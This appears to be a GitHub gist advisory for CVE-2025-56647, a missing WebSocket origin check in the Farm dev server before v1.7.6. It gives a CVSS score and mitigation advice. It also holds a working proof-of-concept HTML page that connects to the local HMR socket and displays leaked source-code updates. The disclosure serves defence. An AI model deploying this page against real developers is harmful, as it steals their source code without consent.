Skip to content

Instantly share code, notes, and snippets.

@R4356th

R4356th/Information Disclosure by Farm's Dev Server in Versions Before v1.7.6 (CVE-2025-56647).md

Created February 6, 2026 06:23
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save R4356th/d4372c6f83275d583c180c0e7d7332af to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save R4356th/d4372c6f83275d583c180c0e7d7332af to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Information Disclosure by Farm's Dev Server in Versions Before v1.7.6 (CVE-2025-56647).md

In versions of Farm before v1.7.6, this security vulnerability is present: Farm's dev (HMR) server does not validate origin when connecting to a WebSocket client. This allows attackers to surveil developers who visit their webpage and potentially steal source code that ends up being leaked by the WebSocket server.

PoC

Code like this would be on the attacker's webpage:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>WebSocket Client Example</title>
</head>
<body>
  <h1>WebSocket Client</h1>
  <div id="status">Connecting...</div>
  <div id="messages"></div>
  <script>
    // Create a new WebSocket connection to the server using the default port
    const socket = new WebSocket('ws://localhost:9000/__hmr', 'farm_hmr')
    // Connection opened
    socket.addEventListener('open', function (event) {
      document.getElementById('status').textContent = 'Connected to WebSocket server';
      // Send a message to the server
      socket.send('Hello, server!');
    });

    // Listen for messages from the server
    socket.addEventListener('message', function (event) {
      const messagesDiv = document.getElementById('messages');
      const messageElement = document.createElement('p');
      messageElement.textContent = `Server says: ${event.data}`;
      messagesDiv.appendChild(messageElement);
    });

    // Connection closed
    socket.addEventListener('close', function (event) {
      document.getElementById('status').textContent = 'Disconnected from WebSocket server';
    });

    // Handle errors
    socket.addEventListener('error', function (event) {
      document.getElementById('status').textContent = 'WebSocket error';
      console.error('WebSocket error:', event);
    });
  </script>
</body>
</html>

Put it in an HTML file, visit it and make changes to your code with the server turned on.

Impact

This vulnerability can be exploited to obtain developers' source code if they end up visiting an attacker-controlled website.

CVSS v3 Score: 6.5/10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
Weakness: CWE-1385 (Missing Origin Validation in WebSockets)

Mitigation

Update it to at least v1.7.6 or refrain from visiting untrusted sites while running farm dev. If that is not possible then isolate your dev environment by using a proxy.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment